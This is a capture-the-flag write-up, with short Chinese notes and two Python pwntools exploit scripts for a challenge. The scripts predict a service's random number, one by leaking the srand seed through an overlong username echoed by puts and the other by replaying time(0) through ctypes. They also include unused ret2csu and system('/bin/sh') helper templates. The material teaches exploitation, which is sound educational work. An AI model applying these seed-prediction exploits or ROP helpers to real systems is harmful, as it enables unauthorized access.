这里使用 puts 泄露随机数种子然后利用 ctypes 模块模拟运行 srand 和 rand 函数做的。
然而，由于涉及到 time(0)，我们也可以用 ctypes 模块模拟运行 time(0) 获得值，这样就不需要 puts 泄露随机数种子。
from struct import pack
from ctypes import *
from LibcSearcher import *
def s(a):
    """Send *a* to the tube `p` as-is (no trailing newline)."""
    p.send(a)
def sa(a, b):
    """Wait until `p` has printed *a*, then send *b* (no trailing newline)."""
    p.sendafter(a, b)
def sl(a):
    """Send *a* to `p` followed by a newline."""
    p.sendline(a)
def sla(a, b):
    """Wait until `p` has printed *a*, then send *b* plus a newline."""
    p.sendlineafter(a, b)
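def r():
    """Receive whatever `p` has available and return it.

    The original discarded the received bytes; returning them mirrors `rl()`
    and lets callers inspect the output.  Callers that ignore the result are
    unaffected.
    """
    return p.recv()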
def pr():
    """Receive from `p` and print the raw bytes (debug helper)."""
    chunk = p.recv()
    print(chunk)
def rl(a):
    """Read from `p` up to and including the delimiter *a*; return the bytes read."""
    data = p.recvuntil(a)
    return data
def inter():
    """Hand the tube `p` over to the user (blocks until the session ends)."""
    p.interactive()
def debug():
    """Attach gdb to the live target `p` and pause until the user continues."""
    gdb.attach(p)
    pause()
def get_addr():
    """Read `p` up to the first 0x7f byte and decode the preceding 6 bytes as a
    little-endian 64-bit value (zero-extended to 8 bytes) — presumably a leaked
    userland pointer whose top bytes are 0x00007f.
    """
    raw = p.recvuntil(b'\x7f')
    low6 = raw[-6:]
    return u64(low6.ljust(8, b'\x00'))
def get_sb():
    """Return (system address, "/bin/sh" address) relative to `libc_base`.

    Template helper: it expects `libc` to be a pwntools ELF (with `.sym` and
    `.search`), but in this file `libc` is bound to a ctypes CDLL and
    `libc_base` is never assigned in the visible code, so this is not
    usable here as written.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr
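def csu(rdi, rsi, rdx, rip, gadget):
    """Build the ret2csu chain fragment used by this template, as bytes.

    The qwords are emitted in this order: `gadget`, 0, 1, `rip`, `rdi`,
    `rsi`, `rdx`, `gadget - 0x1a`.  That is the conventional amd64
    __libc_csu_init layout (pop block at `gadget`, mov/call block 0x1a bytes
    before it) — the 0x1a offset and register-to-argument mapping must be
    verified against the target binary.

    Uses `struct.pack`, which this file imports, instead of pwntools' `p64`,
    which is not among the visible imports; output is identical for
    non-negative values below 2**64.
    """
    def q(v):
        # 8-byte little-endian, same encoding p64 produces.
        return pack('<Q', v)

    chain = (gadget, 0, 1, rip, rdi, rsi, rdx, gadget - 0x1a)
    return b''.join(q(v) for v in chain)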
# NOTE(review): context/remote/ELF/u64 and the `p` tube are pwntools names,
# but `from pwn import *` is not among the imports visible in this file;
# presumably it is provided elsewhere — confirm before running.
context(os='linux', arch='amd64', log_level='debug')

#p = process('./pwn')
p = remote('1.14.71.254', 28309)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')
# The host C library is loaded through ctypes so srand()/rand() can be
# replayed locally.  Default ctypes conversions apply: the integer passed to
# srand() is masked to a C int, and rand() comes back as a Python int.
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

# Log in.  The username is exactly 0x20 bytes so the echoed line can be
# located by that prefix; the password is sent with an explicit NUL.
sa(b'username: ', b'a' * 0x20)
sa(b'password: ', b'ls_4nyth1n9_7ruIy_R4nd0m?\x00')
rl(b'a' * 0x20)

# What follows the echoed username on that line is taken as the leaked seed
# (the puts() leak described in the note above); zero-pad to 8 bytes.
leaked = p.recvline()[:-1]
seed = u64(leaked.ljust(8, b'\x00'))

# Mirror the PRNG sequence the service presumably runs: three rand() calls,
# a reseed derived from them, three discarded draws, then the answer.
libc.srand(seed)
first = libc.rand()
second = libc.rand() ^ first
third = libc.rand()
libc.srand(second ^ third)
for _ in range(3):
    libc.rand()
sla(b'now.\n', str(libc.rand()))

inter()
# Only printed once the interactive session has ended.
print(hex(seed))
#debug()
不需要 puts 泄露的方法
from struct import pack
from ctypes import *
from LibcSearcher import *
def s(a):
    """Send *a* to the tube `p` as-is (no trailing newline)."""
    p.send(a)
def sa(a, b):
    """Wait until `p` has printed *a*, then send *b* (no trailing newline)."""
    p.sendafter(a, b)
def sl(a):
    """Send *a* to `p` followed by a newline."""
    p.sendline(a)
def sla(a, b):
    """Wait until `p` has printed *a*, then send *b* plus a newline."""
    p.sendlineafter(a, b)
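def r():
    """Receive whatever `p` has available and return it.

    The original discarded the received bytes; returning them mirrors `rl()`
    and lets callers inspect the output.  Callers that ignore the result are
    unaffected.
    """
    return p.recv()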
def pr():
    """Receive from `p` and print the raw bytes (debug helper)."""
    chunk = p.recv()
    print(chunk)
def rl(a):
    """Read from `p` up to and including the delimiter *a*; return the bytes read."""
    data = p.recvuntil(a)
    return data
def inter():
    """Hand the tube `p` over to the user (blocks until the session ends)."""
    p.interactive()
def debug():
    """Attach gdb to the live target `p` and pause until the user continues."""
    gdb.attach(p)
    pause()
def get_addr():
    """Read `p` up to the first 0x7f byte and decode the preceding 6 bytes as a
    little-endian 64-bit value (zero-extended to 8 bytes) — presumably a leaked
    userland pointer whose top bytes are 0x00007f.
    """
    raw = p.recvuntil(b'\x7f')
    low6 = raw[-6:]
    return u64(low6.ljust(8, b'\x00'))
def get_sb():
    """Return (system address, "/bin/sh" address) relative to `libc_base`.

    Template helper: it expects `libc` to be a pwntools ELF (with `.sym` and
    `.search`), but in this file `libc` is bound to a ctypes CDLL and
    `libc_base` is never assigned in the visible code, so this is not
    usable here as written.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr
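def csu(rdi, rsi, rdx, rip, gadget):
    """Build the ret2csu chain fragment used by this template, as bytes.

    The qwords are emitted in this order: `gadget`, 0, 1, `rip`, `rdi`,
    `rsi`, `rdx`, `gadget - 0x1a`.  That is the conventional amd64
    __libc_csu_init layout (pop block at `gadget`, mov/call block 0x1a bytes
    before it) — the 0x1a offset and register-to-argument mapping must be
    verified against the target binary.

    Uses `struct.pack`, which this file imports, instead of pwntools' `p64`,
    which is not among the visible imports; output is identical for
    non-negative values below 2**64.
    """
    def q(v):
        # 8-byte little-endian, same encoding p64 produces.
        return pack('<Q', v)

    chain = (gadget, 0, 1, rip, rdi, rsi, rdx, gadget - 0x1a)
    return b''.join(q(v) for v in chain)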
# NOTE(review): context/process/ELF/u64 and the `p` tube are pwntools names,
# but `from pwn import *` is not among the imports visible in this file;
# presumably it is provided elsewhere — confirm before running.
context(os='linux', arch='amd64', log_level='debug')

p = process('./pwn')
#p = remote('1.14.71.254', 28309)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')
# The host C library is loaded through ctypes so srand()/rand()/time() can be
# called locally with default ctypes conversions (int arguments masked to a
# C int; results returned as C int — time() therefore fits only until 2038).
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

# Seed from the local clock instead of the leaked value.  This agrees with
# the target only when both sides call time(0) within the same second, which
# is why the local-process target is the active one here.
libc.srand(libc.time(0))

# Log in.  The username is exactly 0x20 bytes so the echoed line can be
# located by that prefix; the password is sent with an explicit NUL.
sa(b'username: ', b'a' * 0x20)
sa(b'password: ', b'ls_4nyth1n9_7ruIy_R4nd0m?\x00')
rl(b'a' * 0x20)

# The leaked seed line is still consumed to stay in step with the output,
# but it is kept only for the final print; the clock-derived seed is used.
leaked = p.recvline()[:-1]
seed = u64(leaked.ljust(8, b'\x00'))
#libc.srand(seed)

# Mirror the PRNG sequence the target presumably runs: three rand() calls,
# a reseed derived from them, three discarded draws, then the answer.
first = libc.rand()
second = libc.rand() ^ first
third = libc.rand()
libc.srand(second ^ third)
for _ in range(3):
    libc.rand()
sla(b'now.\n', str(libc.rand()))

inter()
# Only printed once the interactive session has ended.
print(hex(seed))
#debug()
